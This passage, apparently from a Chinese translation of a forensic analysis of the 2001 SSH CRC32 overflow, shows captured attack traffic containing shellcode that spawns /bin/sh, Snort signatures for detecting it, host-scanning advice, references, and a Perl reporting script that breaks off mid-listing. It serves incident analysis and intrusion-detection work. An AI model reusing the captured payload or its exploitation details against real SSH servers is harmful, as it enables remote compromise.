=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
注意日志条目的最后一条,如果成功利用此漏洞被入侵,认证过程就会停止,因为
此时SHELLCODE的后门程序已经执行,这样你可以连接端口进行任何操作。唯一的
问题是,SSH守护程序(至少SSH.com 1.2.31)会由于认证过程不完整而超时,导致
关闭开启的SHELL。一般在监听shell的父进程关闭只前会有10分钟时间空域。
网络通信信息分析
=====================
在这里使用了Tcpdump来截获上面的攻击行为,记录信息在sshdx.dump,可以被用
来IDS入侵检测系统获得攻击标志信息。如果你的IDS系统不支持tcpdump文件,你
可以使用"tcpreplay"[12]来转换tcpdump信息。
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
# tcpdump -s1500 -w sshdx.dump ip host 10.10.10.3 &
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
这样可以很容易的查看SSH守护程序产生的多个连接信息,使用"ngrep"[5]工具可以
辨认出最后连接和插入SHELLCODE的暴力破解攻击信息:
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
. . .
T 10.10.10.3:2222 -> 10.10.10.10:32957 [AP]
SSH-1.5-1.2.31.
T 10.10.10.10:32957 -> 10.10.10.3:2222 [AP]
SSH-1.5-OpenSSH_2.2.0p1.
T 10.10.10.3:2222 -> 10.10.10.10:32957 [AP]
............GA..@.......%....`..P.....D&..2.+7#...1!?..c.r).8.^.h.....
..I..b6..9.f........N..0....:BAh@s.e...H......(.D2.Zg......#.......\.j
W...O$....6.......$...V..;...U.@Y.K2.p<\..o..?..l.........*.p.K<s..,..
.@7.wBBy......1.i..%".....G*g.G.t(......M........[.......J......<.
T 10.10.10.10:32957 -> 10.10.10.3:2222 [AP]
............GA..@.....`G.Fg.g.!.i.}..........._.e....=../..6....;....)
T.....|c...#W.\wve.cy .n.....q.Sc....}..".N.G.w"....n.../#.....8x..&.Z
....Q/.......8..
T 10.10.10.3:2222 -> 10.10.10.10:32957 [AP]
.........4..
T 10.10.10.10:32957 -> 10.10.10.3:2222 [A]
..W...2.......2.......2.......2.......2.......2.......2.......2.......
2.......2.......2.......2.......2.......2.......2.......2.......2 ....
..2!......2$......2%......2(......2)......2,......2-......20......21..
....24......25......28......29......2<......2=......2@......2A......2D
......2E......2H......2I......2L......2M......2P......2Q......2T......
2U......2X......2Y......2\......2]......2`......2a......2d......2e....
..2h......2i......2l......2m......2p......2q......2t......2u......2x..
....2y......2|......2}......2.......2.......2.......2.......2.......2.
......2.......2.......2.......2.......2.......2.......2.......2.......
2.......2.......2.......2.......2.......2.......2.......2.......2.....
..2.......2.......2.......2.......2.......2.......2.......2.......2...
....2.......2.......2.......2.......2.......2.......2.......2.......2.
......2.......2.......2.......2.......2.......2.......2.......2.......
2.......2.......2.......2.......2.......2.......2.......2.......2.....
..2.......2.......2.......2.......2.......2.......3.......3.......3...
....3.......3.......3.......3.......3.......3.......3.......3.......3.
......3.......3.......3.......3.......3 ......3!......3$......3%......
3(......3)......3,......3-......30......31......34......35......38....
..39......3<......3=......3@......3A......3D......3E......3H......3I..
....3L......3M......3P......3Q......3T......3U......3X......3Y......3\
......3]......3`......3a......3d........1...p}.@
T 10.10.10.10:32957 -> 10.10.10.3:2222 [A]
......3i......3l......3m......3p......3q......3t......3u......3x......
3y......3|......3}......3.......3.......3.......3.......3.......3.....
..3.......3.......3.......3.......3.......3.......3.......3.......3...
....3.......3.......3.......3.......3.......3.......3.......3.......3.
......3.......3.......3.......3.......3.......3.......3.......3.......
3.......3.......3.......3.......3.......3.......3.......3.......3.....
..3.......3.......3.......3.......3.......3.......3.......3.......3...
....3.......3.......3.......3.......3.......3.......3.......3.......3.
......3.......3.......3.......3.......3.......4.......4.......4.......
4.......4.......4.......4.......4.......4.......4.......4.......4.....
..4.......4.......4.......4.......4 ......4!......4$......4%......4(..
....4)......4,......4-......40......41......44......45......48......49
......4<......4=......4@......4A......4D......4E......4H......4I......
4L......4M......4P......4Q......4T......4U......4X......4Y......4\....
..4]......4`......4a......4d......4e......4h......4i......4l......4m..
....4p......4q......4t......4u......4x......4y......4|......4}......4.
......4.......4.......4.......4.......4.......4.......4.......4.......
4.......4.......4.......4.......4.......4.......4.......4.......4.....
..4.......4.......4.......4.......4.......4.......4.......4.......4...
....4.......4.......4.......4.......4.......4.......4.......4.......4.
......4.......4.......4.......4.........1...p}.@
. . .
T 10.10.10.10:32957 -> 10.10.10.3:2222 [A]
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
.....................1..f..1...C.].C.].K.M..M...1..E.Cf.].f.E.09.M..E.
.E..E.....M.....CC....C....1..?......A....^.u.1..F..E......M..U.......
./bin/sh.h0h0h0, 7350, zip/TESO!......................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
........................................1...p}.@
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
这样针对这个攻击程序你可以匹配如下字符串"h0h0h0, 7350, zip/TESO!" [7] 和NOP等。
下面的特征字符串由Marty Roesch 和 Brian Caswell开发并可使用在Snort v1.8 或者
更高的版本[6]:
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
alert tcp $EXTERNAL_NET any -> $HOME_NET 22 \
(msg:"EXPLOIT ssh CRC32 overflow /bin/sh"; \
flags:A+; content:"/bin/sh"; \
reference:bugtraq,2347; reference:cve,CVE-2001-0144; \
classtype:shellcode-detect;)
alert tcp $EXTERNAL_NET any -> $HOME_NET 22 \
(msg:"EXPLOIT ssh CRC32 overflow filler"; \
flags:A+; content:"|00 00 00 00 00 00 00 00 00 00 00 00 00|"; \
reference:bugtraq,2347; reference:cve,CVE-2001-0144; \
classtype:shellcode-detect;)
alert tcp $EXTERNAL_NET any -> $HOME_NET 22 \
(msg:"EXPLOIT ssh CRC32 overflow NOOP"; \
flags:A+; content:"|90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90|"; \
reference:bugtraq,2347; reference:cve,CVE-2001-0144; \
classtype:shellcode-detect;)
alert tcp $EXTERNAL_NET any -> $HOME_NET 22 \
(msg:"EXPLOIT ssh CRC32 overflow"; \
flags:A+; content:"|00 01 57 00 00 00 18|"; offset:0; depth:7; \
content:"|FF FF FF FF 00 00|"; offset:8; depth:14; \
reference:bugtraq,2347; reference:cve,CVE-2001-0144; \
classtype:shellcode-detect;)
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
鉴别你的主机是否存在此漏洞
===========================
你可以使用Jeremy Mates' scan_ssh.pl[8] 和 Niels Provos' ScanSSH scanner[9]
写的脚本来鉴别SSH服务和它们的版本。
Russell Fulton 也公布了一个脚本程序Argus[10]用来处理日志,包含在下面的附录中。
----------------------------------------------------------------------------
参考
========
[1] Portable Linux Amazing CD (PLAC) v2.9.1pre2, by Fred Cohen
http://www.all.net/ForensiX/plac.html
[2] Netcat, by der Hobbit
http://www.l0pht.com/~weld/netcat/
[3] Reverse Engineer's Query Tool
http://packetstormsecurity.org/linux/reverse-engineering/reqt-0.7f.tar.gz
[4] LiSt Open Files (lsof)
http://sunsite.securitycentralhq.com/mirrors/security/lsof/lsof.tar.gz
[5] ngrep, by Jordan Ritter
http://www.packetfactory.net/projects/ngrep/
[6] Snort
http://www.snort.org/
[7] 7350.org / 7350
http://www.7350.org/
http://www.team-teso.org/about.php (see the bottom)
[8] Jeremy Mates 提供的ssh_scan.pl
http://sial.org/code/perl/scripts/ssh_scan.pl.html
[9] Niels Provos提供的ScanSSH 扫描程序
http://www.monkey.org/~provos/scanssh/
[10] Argus - 网络传输审核工具
http://www.pl.freebsd.org/es/ports/net.html#argus-1.8.1
[11] tcpdump
http://staff.washington.edu/dittrich/misc/sshdx.dump
[12] tcpreplay
http://packages.debian.org/testing/net/tcpreplay.html
Appendix A
==========
两个扫描脚本如下
=-=-=-=-=-=-=-=-=-=-=-=-=-=- cut here -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
#!/usr/bin/perl
#
# ssh-report
#
# Dave Dittrich <dittrich@cac.washington.edu>
# Thu Nov 8 21:39:20 PST 2001
#
# Process output of scans for SSH servers, with version identifying
# information, into two level break report format by SSH version.
#
# This script operates on a list of scan results that look
# like this:
#
# % cat scanresults
# 10.0.0.1 beavertail.dept.foo.edu SSH-1.5-1.2.31
# 10.0.0.2 lumpysoup.dept.foo.edu SSH-1.5-1.2.31
# 10.0.0.3 marktwain.dept.foo.edu SSH-1.99-OpenSSH_2.5.2p2
# 10.0.0.4 junebug.dept.foo.edu SSH-1.5-1.2.31
# 10.0.0.10 calvin.dept.foo.edu SSH-1.99-OpenSSH_2.5.2p2
# 10.0.0.11 hobbes.dept.foo.edu SSH-1.99-OpenSSH_2.1.1
# 10.0.0.20 willow.dept.foo.edu SSH-1.99-OpenSSH_2.9p2
# 10.0.0.21 berry.dept.foo.edu SSH-1.99-OpenSSH_2.9p2
# 10.0.0.23 whimpy.dept.foo.edu SSH-1.99-OpenSSH_2.9p2
#
# The resulting report (without the "-a" flag) will look like this:
#
# % ssh-report < scanresults
#
# SSH-1.5-1.2.31 (affected)
# beavertail.dept.foo.edu(10.0.0.1)
# lumpysoup.dept.foo.edu(10.0.0.2)
# junebug.dept.foo.edu(10.0.0.4)
#
#
# SSH-1.99-OpenSSH_2.1.1 (affected)
# hobbes.dept.foo.edu(10.0.0.11)
#
# By default, this script will only report on those systems that
# are running potentially vulnerable SSH servers. Use the "-a"
# option to report on all servers. Use "grep -v" to filter out
# hosts *before* you run them through this reporting script.
#
# SSH servers are considered "affected" if they are known, by being
# listed in one or more of the following references, to have the crc32
# compensation attack detector vulnerability:
#
# http://www.kb.cert.org/vuls/id/945216
# http://www.securityfocus.com/bid/2347/
# http://xforce.iss.net/alerts/advise100.php
# http://www.ssh.com/products/ssh/advisories/ssh1_crc-32.cfm
#
# You also may need to adjust the logic below to lump systems
# into the "Unknown" category correctly (e.g., if your server
# has a custom version string, access control, etc.)
#
# The list below of servers and potential vulnerability was derived by
# summarizing existing versions on a set of production networks and
# using the advisories and reference material listed above. You
# should update this list as new information is obtained, or if new
# versions of the SSH server are found on your network.
%affected = (
'Unknown', 'unknown',
'SSH-1.4-1.2.14', 'not affected',
'SSH-1.4-1.2.15', 'not affected',
'SSH-1.4-1.2.16', 'no (http://www.fanqiang.com)